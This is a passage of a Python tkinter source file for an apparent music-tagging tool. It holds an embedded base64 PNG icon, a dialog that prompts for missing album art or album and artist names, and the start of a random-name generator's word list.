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"""
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince7')
class taffy:
dataToReturn=None
def handler(available,issue): # This will handle missing album art and additional info.
ram.LiveFeedback='Waiting for User to Enter Missing data.'
taffy.dataToReturn=None
roota = tkinter.Tk()
background_image2=tkinter.PhotoImage(data = img.D)
roota.iconphoto(False, background_image2)
w = 600
h = 400
ws = roota.winfo_screenwidth()
hs = roota.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
roota.geometry('%dx%d+%d+%d' % (w, h, x, y))
roota.resizable(0, 0)
roota.configure(bg='#000099')
roota.title('Missing Album '+issue[0].upper()+issue[1:]+'.')
donna=400
class zat:
canva=None
canC='#000099' # zat.canC
def quitt():
roota.destroy()
acv = tkinter.Button(roota,text ="Done",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',command=quitt, anchor='c',font=('Helvetica', 14, 'bold'))
acv.pack()
acv.place(bordermode=OUTSIDE, height=50, width=300,relx=0.5, rely=1.0, anchor=SW)
if issue=='cover':
msa = Label(roota, text="Missing Album Art",font=('Helvetica', 13, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',anchor='center')
msa.place(bordermode=OUTSIDE, height=27, width=300,relx=0.0, rely=0.0, anchor=NW)
msa3 = Label(roota, text="Album Information",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',font=('Helvetica', 13, 'bold'),anchor='center')
msa3.place(bordermode=OUTSIDE, height=27, width=300,relx=1.0, rely=0.0, anchor=NE)
zat.canva=tkinter.Canvas(roota, relief=SUNKEN, height=300, width=300,bg=zat.canC,highlightthickness=1, highlightbackground="cyan")
zat.canva.pack()
zat.canva.place(bordermode=OUTSIDE,height=300,width=300,relx=0,rely=0.056,anchor=NW)
msa4 = Label(roota, relief=SUNKEN,text="Please Select Album Art in JPG Format.",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',font=('Helvetica', 9, 'bold'),anchor='w')
msa4.place(bordermode=OUTSIDE, height=26, width=300,relx=0.0, rely=0.84, anchor=W)
def upd():
fbi=str(browseFile())
roota.lift()
if os.path.isfile(fbi)==False:
msa4.config(text='Must Choose JPG/JPEG Image.')
return
if fbi.lower().endswith('.jpg') or fbi.lower().endswith('.jpeg'):
pass
else:
msa4.config(text='Must Choose JPG/JPEG Image..')
return
taffy.dataToReturn=str(fbi)
roota.destroy()
return
'''
try:
zat.canva.destroy()
image2 = Image.open(fbi)
size = 300, 300
image2.thumbnail(size,Image.ANTIALIAS)
photo2 = ImageTk.PhotoImage(image2)
zat.canva=tkinter.Canvas(roota, height=300, width=300,bg=zat.canC,highlightthickness=1, highlightbackground="cyan")
zat.canva.pack()
zat.canva.place(bordermode=OUTSIDE,height=300,width=300,relx=0,rely=0.06,anchor=NW)
labelh = Label(zat.canva,bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',image=photo2)
labelh.image = photo2
labelh.place(bordermode=OUTSIDE,relx=0,rely=0,width=302,height=302)
flip=fbi.split('\\')
flip=flip[-1]
flip=fbi.split('/')
flip=flip[-1]
msa4.config(text=str(flip))
taffy.dataToReturn=str(fbi)
except:
try:
zat.canva.destroy()
except:
pass
acv.config(text='Must Choose JPG/JPEG Image...')
zat.canva=tkinter.Canvas(roota, height=300, width=300,bg=zat.canC,highlightthickness=1, highlightbackground="cyan")
zat.canva.pack()
zat.canva.place(bordermode=OUTSIDE,height=300,width=300,relx=0,rely=0.06,anchor=NW)
'''
a = tkinter.Button(roota,text ="Open Cover Selector",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',command=upd, anchor='c',font=('Helvetica', 14, 'bold'))
a.pack()
a.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=1.0, anchor=SW)
donna=400
red = tkinter.Text(roota,bg='#000099',fg='#00ffff',font=('Helvetica', 12,'bold'))
red.pack()
red.place(bordermode=OUTSIDE, height=325, width=300,relx=1, rely=0.060, anchor=NE)
cod=True
fix=True
taft=''
for t in available:
if cod:
cod=False
taft+='Album: '+t+'\n'
else:
if fix:
taft+='Artist: '+t+'\n'
taft+='__________________Filenames Below\n'
fix=False
else:
taft+=t+'\n'
red.insert("1.0", taft)
red.config(state=DISABLED)
else:
val='Missing Album '
if issue=='name':
val+='Name'
else:
val+='Artist'
msa = Label(roota, text=val,font=('Helvetica', 13, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',anchor='center')
msa.place(bordermode=OUTSIDE, height=27, width=300,relx=0.0, rely=0.0, anchor=NW)
msa3 = Label(roota, text="Album Information",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',font=('Helvetica', 13, 'bold'),anchor='center')
msa3.place(bordermode=OUTSIDE, height=27, width=300,relx=1.0, rely=0.0, anchor=NE)
def leaveBlank():
taffy.dataToReturn=None
roota.destroy()
return
a = tkinter.Button(roota,text ="Leave Blank",command=leaveBlank, anchor='c',font=('Helvetica', 14, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099')
a.pack()
a.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=1.0, anchor=SW)
donna=400
red = tkinter.Text(roota,bg='#000099',fg='#00ffff',font=('Helvetica', 12,'bold'))
red.pack()
red.place(bordermode=OUTSIDE, height=325, width=300,relx=1, rely=0.060, anchor=NE)
fix=True
taft=''
for t in available:
if fix:
if issue=='name':
taft+='Artist: '
else:
taft+='Album: '
taft+=t+'\n'+'__________________Filenames Below\n'
fix=False
else:
taft+=t+'\n'
red.insert("1.0", taft)
red.config(state=DISABLED)
class jig:
fig=True
a=True
red2 = tkinter.Text(roota,wrap=WORD,font=('Helvetica', 12),bg='#b3b3ff',fg='black')
red2.pack()
red2.place(bordermode=OUTSIDE, height=230, width=300,relx=0, rely=0.062, anchor=NW)
dell='Type '
if issue=='name':
dell+='Album Name Here'
else:
dell+='Artist Name Here'
red2.insert('1.0',dell)
def clara():
red2.delete('1.0',END)
jig.fig=False
if issue=='name':
jig.a=True # 'Artist Name Here'
else:
jig.a=False # 'Album Name Here'
def randoM():
clara()
temp=''
if jig.a: # Gen Album Name
A=['Analyse', 'Approach', 'Area', 'Assess', 'Assume', 'Authority', 'Available', 'Benefit', 'Concept', 'Consist', 'Constitute', 'Context', 'Contract', 'Create', 'Data', 'Define', 'Derive', 'Distribute', 'Economy', 'Environment', 'Establish', 'Estimate', 'Evident', 'Export', 'Factor', 'Finance', 'Formula', 'Function', 'Identify', 'Income', 'Indicate', 'Individual', 'Interpret', 'Involve', 'Issue', 'Labour', 'Legal', 'Legislate', 'Major', 'Method', 'Occur', 'Percent', 'Period', 'Policy', 'Principle', 'Proceed', 'Process', 'Require', 'Research', 'Respond', 'Role', 'Section', 'Sector', 'Significant', 'Similar', 'Source', 'Specific', 'Structure', 'Theory', 'Vary', 'Achieve', 'Acquire', 'Administrate', 'Affect', 'Appropriate', 'Aspect', 'Assist', 'Category', 'Chapter', 'Commission', 'Community', 'Complex', 'Compute', 'Conclude', 'Conduct', 'Consequent', 'Construct', 'Consume', 'Credit', 'Culture', 'Design', 'Distinct', 'Element', 'Equate', 'Evaluate', 'Feature', 'Final', 'Focus', 'Impact', 'Injure', 'Institute', 'Invest', 'Item', 'Journal', 'Maintain', 'Normal', 'Obtain', 'Participate', 'Perceive', 'Positive', 'Potential', 'Previous', 'Primary', 'Purchase', 'Range', 'Region', 'Regulate', 'Relevant', 'Reside', 'Resource', 'Restrict', 'Secure', 'Seek', 'Select', 'Site', 'Strategy', 'Survey', 'Text', 'Tradition', 'Transfer', 'Alternative', 'Circumstance', 'Comment', 'Compensate', 'Component', 'Consent', 'Considerable', 'Constant', 'Constrain', 'Contribute', 'Convene', 'Coordinate', 'Core', 'Corporate', 'Correspond', 'Criteria', 'Deduce', 'Demonstrate', 'Document', 'Dominate', 'Emphasis', 'Ensure', 'Exclude', 'Framework', 'Fund', 'Illustrate', 'Immigrate', 'Imply', 'Initial', 'Instance', 'Interact', 'Justify', 'Layer', 'Link', 'Locate', 'Maximise', 'Minor', 'Negate', 'Outcome', 'Partner', 'Philosophy', 'Physical', 'Proportion', 'Publish', 'React', 'Register', 'Rely', 'Remove', 'Scheme', 'Sequence', 'Sex', 'Shift', 'Specify', 'Sufficient', 'Task', 'Technical', 'Technique', 'Technology', 'Valid', 'Volume', 'Access', 'Adequate', 'Annual', 'Apparent', 'Approximate', 'Attitude', 'Attribute', 'Civil', 'Code', 'Commit', 'Communicate', 'Concentrate', 'Confer', 'Contrast', 'Cycle', 'Debate', 'Despite', 'Dimension', 'Domestic', 'Emerge', 'Error', 'Ethnic', 'Goal', 'Grant', 'Hence', 'Hypothesis', 'Implement', 'Implicate', 'Impose', 'Integrate', 'Internal', 'Investigate', 'Job', 'Label', 'Mechanism', 'Obvious', 'Occupy', 'Option', 'Output', 'Overall', 'Parallel', 'Parameter', 'Phase', 'Predict', 'Principal', 'Prior', 'Professional', 'Project', 'Promote', 'Regime', 'Resolve', 'Retain', 'Series', 'Statistic', 'Status', 'Stress', 'Subsequent', 'Sum', 'Summary', 'Undertake', 'Academy', 'Adjust', 'Alter', 'Amend', 'Aware', 'Capacity', 'Challenge', 'Clause', 'Compound', 'Conflict', 'Consult', 'Contact', 'Decline', 'Discrete', 'Draft', 'Enable', 'Energy', 'Enforce', 'Entity', 'Equivalent', 'Evolve', 'Expand', 'Expose', 'External', 'Facilitate', 'Fundamental', 'Generate', 'Generation', 'Image', 'Liberal', 'Licence', 'Logic', 'Margin', 'Medical', 'Mental', 'Modify', 'Monitor', 'Network', 'Notion', 'Objective', 'Orient', 'Perspective', 'Precise', 'Prime', 'Psychology', 'Pursue', 'Ratio', 'Reject', 'Revenue', 'Stable', 'Style', 'Substitute', 'Sustain', 'Symbol', 'Target', 'Transit', 'Trend', 'Version', 'Welfare', 'Whereas', 'Abstract', 'Accurate', 'Acknowledge', 'Aggregate', 'Allocate', 'Assign', 'Attach', 'Author', 'Bond', 'Brief', 'Capable', 'Cite', 'Cooperate', 'Discriminate', 'Display', 'Diverse', 'Domain', 'Edit', 'Enhance', 'Estate', 'Exceed', 'Expert', 'Explicit', 'Federal', 'Fee', 'Flexible', 'Furthermore', 'Gender', 'Ignorant', 'Incentive', 'Incidence', 'Incorporate', 'Index', 'Inhibit', 'Initiate', 'Input', 'Instruct', 'Intelligent', 'Interval', 'Lecture', 'Migrate', 'Minimum', 'Ministry', 'Motive', 'Neutral', 'Nevertheless', 'Overseas', 'Precede', 'Presume', 'Rational', 'Recover', 'Reveal', 'Scope', 'Subsidy', 'Tape', 'Trace', 'Transform', 'Transport', 'Underlie', 'Utilise', 'Adapt', 'Adult', 'Advocate', 'Aid', 'Channel', 'Chemical', 'Classic', 'Comprehensive', 'Comprise', 'Confirm', 'Contrary', 'Convert', 'Couple', 'Decade', 'Definite', 'Deny', 'Differentiate', 'Dispose', 'Dynamic', 'Eliminate', 'Empirical', 'Equip', 'Extract', 'File', 'Finite', 'Foundation', 'Globe', 'Grade', 'Guarantee', 'Hierarchy', 'Identical', 'Ideology', 'Infer', 'Innovate', 'Insert', 'Intervene', 'Isolate', 'Media', 'Mode', 'Paradigm', 'Phenomenon', 'Priority', 'Prohibit', 'Publication', 'Quote', 'Release', 'Reverse', 'Simulate', 'Sole', 'Somewhat', 'Submit', 'Successor', 'Survive', 'Thesis', 'Topic', 'Transmit', 'Ultimate', 'Unique', 'Visible', 'Voluntary', 'Abandon', 'Accompany', 'Accumulate', 'Ambiguous', 'Append', 'Appreciate', 'Arbitrary', 'Automate', 'Bias', 'Chart', 'Clarify', 'Commodity', 'Complement', 'Conform', 'Contemporary', 'Contradict', 'Crucial', 'Currency', 'Denote', 'Detect', 'Deviate', 'Displace', 'Drama', 'Eventual', 'Exhibit', 'Exploit', 'Fluctuate', 'Guideline', 'Highlight', 'Implicit', 'Induce', 'Inevitable', 'Infrastructure', 'Inspect', 'Intense', 'Manipulate', 'Minimise', 'Nuclear', 'Offset', 'Paragraph', 'Plus', 'Practitioner', 'Predominant', 'Prospect', 'Radical', 'Random', 'Reinforce', 'Restore', 'Revise', 'Schedule', 'Tense', 'Terminate', 'Theme', 'Thereby', 'Uniform', 'Vehicle', 'Via', 'Virtual', 'Visual', 'Widespread', 'Accommodate', 'Analogy', 'Anticipate', 'Assure', 'Attain', 'Behalf', 'Bulk', 'Cease', 'Coherent', 'Coincide', 'Commence', 'Compatible', 'Concurrent', 'Confine', 'Controversy', 'Converse', 'Device', 'Devote', 'Diminish', 'Distort', 'Duration', 'Erode', 'Ethic', 'Format', 'Found', 'Inherent', 'Insight', 'Integral', 'Intermediate', 'Manual', 'Mature', 'Mediate', 'Medium', 'Military', 'Minimal', 'Mutual', 'Norm', 'Overlap', 'Passive', 'Portion', 'Preliminary', 'Protocol', 'Qualitative', 'Refine', 'Relax', 'Restrain', 'Revolution', 'Rigid', 'Route', 'Scenario', 'Sphere', 'Subordinate', 'Supplement', 'Suspend', 'Team', 'Temporary', 'Trigger', 'Unify', 'Violate', 'Vision', 'Adjacent', 'Albeit', 'Assemble', 'Collapse', 'Colleague', 'Compile', 'Conceive', 'Convince', 'Depress', 'Encounter', 'Enormous', 'Forthcoming', 'Incline', 'Integrity', 'Intrinsic', 